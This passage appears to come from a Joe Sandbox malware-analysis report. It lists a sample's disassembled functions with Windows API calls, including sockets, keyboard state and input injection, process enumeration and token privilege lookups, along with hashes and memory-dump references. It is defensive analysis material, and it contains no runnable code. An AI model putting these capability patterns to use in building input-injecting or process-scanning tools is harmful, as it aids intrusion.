                                                                                                            • Instruction Fuzzy Hash: EB512F74900245EFDF10EF69D8819AE7BB6FFA53A0F188159F9159B2A0D730ED81CB60
                                                                                                            Function 00DD1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00DD1AFD
                                                                                                            • WSAGetLastError.WSOCK32 ref: 00DD1B0B
                                                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00DD1B8A
                                                                                                            • WSAGetLastError.WSOCK32 ref: 00DD1B94
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$socket
                                                                                                            • String ID:
                                                                                                            • API String ID: 1881357543-0
                                                                                                            • Opcode ID: 5c413fa98bd4c283f3619ba694e6bacabaea54f5c3c056292ced69a8d98b30e0
                                                                                                            • Instruction ID: 4743d37154b7a880daefe08b2217064f24b63855851c348b5504eb528040054f
                                                                                                            • Opcode Fuzzy Hash: 5c413fa98bd4c283f3619ba694e6bacabaea54f5c3c056292ced69a8d98b30e0
                                                                                                            • Instruction Fuzzy Hash: FD417338640200AFEB20AF24C886F2A77E5EB45718F548459F9559F3D2D772ED41CBB0
                                                                                                            Function 00D8B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7dd21a7d3a1a6c9ea0425515edcb060683d9f2e270e24a26c5ddaf96862824dc
                                                                                                            • Instruction ID: 846379266b360966668dfb120279d8eeaeebe03b436b0d43956a2a660317e1dd
                                                                                                            • Opcode Fuzzy Hash: 7dd21a7d3a1a6c9ea0425515edcb060683d9f2e270e24a26c5ddaf96862824dc
                                                                                                            • Instruction Fuzzy Hash: 75411775A00704BFD724AF3CCC42B6ABBE9EB88724F10856BF546DB292D771990187B0
                                                                                                            Function 00DC56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DC5783
                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00DC57A9
                                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DC57CE
                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DC57FA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 3321077145-0
                                                                                                            • Opcode ID: 38a4c82b762998355e4a8f42932502303bba6dd5af80d3aba73991ba6078ffba
                                                                                                            • Instruction ID: 2110f62ce8ea40ff2641befd8d3e1015045ef3e256df8d6872d0f50267560ce3
                                                                                                            • Opcode Fuzzy Hash: 38a4c82b762998355e4a8f42932502303bba6dd5af80d3aba73991ba6078ffba
                                                                                                            • Instruction Fuzzy Hash: FB411C35600611DFCF11EF15D444A5ABBE1EF89321B198488EC4A9B362DB30FD45CBB1
                                                                                                            Function 00D8D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00D76D71,00000000,00000000,00D782D9,?,00D782D9,?,00000001,00D76D71,8BE85006,00000001,00D782D9,00D782D9), ref: 00D8D910
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D8D999
                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00D8D9AB
                                                                                                            • __freea.LIBCMT ref: 00D8D9B4
                                                                                                              • Part of subcall function 00D83820: RtlAllocateHeap.NTDLL(00000000,?,00E21444,?,00D6FDF5,?,?,00D5A976,00000010,00E21440,00D513FC,?,00D513C6,?,00D51129), ref: 00D83852
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                            • String ID:
                                                                                                            • API String ID: 2652629310-0
                                                                                                            • Opcode ID: 076749db1e9f6c1dc0e8c8b1b71879429081eb83a00b66297d76216c55ad78b2
                                                                                                            • Instruction ID: ec133f78264df2d13a1a23f63ced8135741806c4fe34ea8ad0ca625edd68d1e8
                                                                                                            • Opcode Fuzzy Hash: 076749db1e9f6c1dc0e8c8b1b71879429081eb83a00b66297d76216c55ad78b2
                                                                                                            • Instruction Fuzzy Hash: 7C31B272A0021AABDF25AF65DC41EAE7BA6EB40710F194168FC08D72D0E735CD55CBB0
                                                                                                            Function 00DE52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00DE5352
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00DE5375
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DE5382
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DE53A8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3340791633-0
                                                                                                            • Opcode ID: 653a95356bfbf6bead5d2e1207e7d13f32a83da1572238ecb9fee639f73ccc06
                                                                                                            • Instruction ID: d7a5a5a7aefb65107c3c6bfd56040daad9266f7cbc9b750d3f67b09a28c831d5
                                                                                                            • Opcode Fuzzy Hash: 653a95356bfbf6bead5d2e1207e7d13f32a83da1572238ecb9fee639f73ccc06
                                                                                                            • Instruction Fuzzy Hash: 2C313534A55A88EFEB30BF16EC45BE83762AB043D4F5C0001FA40962E5C3B0AD809B71
                                                                                                            Function 00DBAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00DBABF1
                                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00DBAC0D
                                                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00DBAC74
                                                                                                            • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00DBACC6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 432972143-0
                                                                                                            • Opcode ID: 3220ce8fe63942dd49319478ca2264790124429934fc8453bad917acbc071522
                                                                                                            • Instruction ID: a44bd98308a7f443a0050c29feeffda3be22c0f5b845c573b0cbb3b85c92a306
                                                                                                            • Opcode Fuzzy Hash: 3220ce8fe63942dd49319478ca2264790124429934fc8453bad917acbc071522
                                                                                                            • Instruction Fuzzy Hash: 25312634A00358EFEF35CB6C8C457FE7FA5AB89310F08421AE486962D1D374C98187B2
                                                                                                            Function 00DE7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ClientToScreen.USER32(?,?), ref: 00DE769A
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00DE7710
                                                                                                            • PtInRect.USER32(?,?,00DE8B89), ref: 00DE7720
                                                                                                            • MessageBeep.USER32(00000000), ref: 00DE778C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1352109105-0
                                                                                                            • Opcode ID: bc92e8d332405d960df668a7b9a7afdf72cf7e0dcd34d39a98275d93433ed376
                                                                                                            • Instruction ID: ecc4cd2ba1c36a82262fd58c9e5185a380c9d88dc8d075e0b7a3b081a90d3566
                                                                                                            • Opcode Fuzzy Hash: bc92e8d332405d960df668a7b9a7afdf72cf7e0dcd34d39a98275d93433ed376
                                                                                                            • Instruction Fuzzy Hash: 3E41AD34609294DFDB51FF5AC894EA977F4FB49304F1940A8E854DB261C330E986CFA0
                                                                                                            Function 00DE16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetForegroundWindow.USER32 ref: 00DE16EB
                                                                                                              • Part of subcall function 00DB3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB3A57
                                                                                                              • Part of subcall function 00DB3A3D: GetCurrentThreadId.KERNEL32 ref: 00DB3A5E
                                                                                                              • Part of subcall function 00DB3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DB25B3), ref: 00DB3A65
                                                                                                            • GetCaretPos.USER32(?), ref: 00DE16FF
                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00DE174C
                                                                                                            • GetForegroundWindow.USER32 ref: 00DE1752
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2759813231-0
                                                                                                            • Opcode ID: f216408ff0a20c87d7af46ee9817fc3169720145029908e098899dff5610f118
                                                                                                            • Instruction ID: 4369313cfad96c9b906bc6a11adc7255094ab42125da23db16e13de7273c681d
                                                                                                            • Opcode Fuzzy Hash: f216408ff0a20c87d7af46ee9817fc3169720145029908e098899dff5610f118
                                                                                                            • Instruction Fuzzy Hash: 43311075E10249AFDB04EFAAC881DAEB7F9EF48304B548069E815E7251D631DE45CBB0
                                                                                                            Function 00DBD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00DBD501
                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00DBD50F
                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00DBD52F
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DBD5DC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 420147892-0
                                                                                                            • Opcode ID: 52718ead7edfe942f24b3630ab3ea5f33cbe59c44cdee0cc51f2dc5e68f0306a
                                                                                                            • Instruction ID: 2272ce42b2ec7a809af902dc8394062167ca3df62afe14f71ee7bfa2ffdb5e3c
                                                                                                            • Opcode Fuzzy Hash: 52718ead7edfe942f24b3630ab3ea5f33cbe59c44cdee0cc51f2dc5e68f0306a
                                                                                                            • Instruction Fuzzy Hash: 1F31AF71008340DFD710EF54C891AAFBBE8EF99344F54092DF982871A2EB719949CBB2
                                                                                                            Function 00DE8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2
                                                                                                            • GetCursorPos.USER32(?), ref: 00DE9001
                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00DA7711,?,?,?,?,?), ref: 00DE9016
                                                                                                            • GetCursorPos.USER32(?), ref: 00DE905E
                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00DA7711,?,?,?), ref: 00DE9094
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2864067406-0
                                                                                                            • Opcode ID: beda9b638c30d820cd45750b9b0adbaf9312c1644fc8b4fba5d5e849bb4d7cd5
                                                                                                            • Instruction ID: 2f2b8bcca9e2b678c698ed041fcb53e093137f115d21c1d249e1f8a4c7d11d30
                                                                                                            • Opcode Fuzzy Hash: beda9b638c30d820cd45750b9b0adbaf9312c1644fc8b4fba5d5e849bb4d7cd5
                                                                                                            • Instruction Fuzzy Hash: 7A21D331601158EFCB259F96CCA8EFABBB9EF89350F484055F5059B261C3319A91DB70
                                                                                                            Function 00DBD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNEL32(?,00DECB68), ref: 00DBD2FB
                                                                                                            • GetLastError.KERNEL32 ref: 00DBD30A
                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DBD319
                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00DECB68), ref: 00DBD376
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 2267087916-0
                                                                                                            • Opcode ID: 52b8048ce9520ab2bd34159d23c552161859bb702a11f4b9f135ce6758b78600
                                                                                                            • Instruction ID: 731078507ece5925930824064321b10c6a20c82ef0d55f575573ec90189ccd1b
                                                                                                            • Opcode Fuzzy Hash: 52b8048ce9520ab2bd34159d23c552161859bb702a11f4b9f135ce6758b78600
                                                                                                            • Instruction Fuzzy Hash: 6A218370505301DF8710EF68C8814AABBE5EE55364F544A1DF89AC73A2E731D94ACBB3
                                                                                                            Function 00DB1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DB1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DB102A
                                                                                                              • Part of subcall function 00DB1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DB1036
                                                                                                              • Part of subcall function 00DB1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DB1045
                                                                                                              • Part of subcall function 00DB1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00DB104C
                                                                                                              • Part of subcall function 00DB1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DB1062
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00DB15BE
                                                                                                            • _memcmp.LIBVCRUNTIME ref: 00DB15E1
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB1617
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00DB161E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1592001646-0
                                                                                                            • Opcode ID: d51053e1e95a3902a398877284bcdb34803911b9ed4930a186fd8881d383a6a6
                                                                                                            • Instruction ID: fc2502f11c5b2c20e3a126c9e3e7c10aab7920cfe7e480038a73de4c7172304a
                                                                                                            • Opcode Fuzzy Hash: d51053e1e95a3902a398877284bcdb34803911b9ed4930a186fd8881d383a6a6
                                                                                                            • Instruction Fuzzy Hash: DB214876E00209EFDB10DFA8C955BEEB7F8EF44354F588459E446AB241E730AA05CBB0
                                                                                                            Function 00DE2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00DE280A
                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DE2824
                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DE2832
                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00DE2840
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                                            • String ID:
                                                                                                            • API String ID: 2169480361-0
                                                                                                            • Opcode ID: 013bbb1b434efcd40f881276b8847affde7abdb5db4cea998f74a344342c1f67
                                                                                                            • Instruction ID: d4a8635744877e3ef0bd7e6cf7281391b8699956ace7535dc730073a83bec92c
                                                                                                            • Opcode Fuzzy Hash: 013bbb1b434efcd40f881276b8847affde7abdb5db4cea998f74a344342c1f67
                                                                                                            • Instruction Fuzzy Hash: 7F219231205691AFD714BB25C885F7A77A9EF85324F148158F826CB6A2C771EC42C7B0
                                                                                                            Function 00DB78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DB8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00DB790A,?,000000FF,?,00DB8754,00000000,?,0000001C,?,?), ref: 00DB8D8C
                                                                                                              • Part of subcall function 00DB8D7D: lstrcpyW.KERNEL32(00000000,?,?,00DB790A,?,000000FF,?,00DB8754,00000000,?,0000001C,?,?,00000000), ref: 00DB8DB2
                                                                                                              • Part of subcall function 00DB8D7D: lstrcmpiW.KERNEL32(00000000,?,00DB790A,?,000000FF,?,00DB8754,00000000,?,0000001C,?,?), ref: 00DB8DE3
                                                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00DB8754,00000000,?,0000001C,?,?,00000000), ref: 00DB7923
                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,00DB8754,00000000,?,0000001C,?,?,00000000), ref: 00DB7949
                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00DB8754,00000000,?,0000001C,?,?,00000000), ref: 00DB7984
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
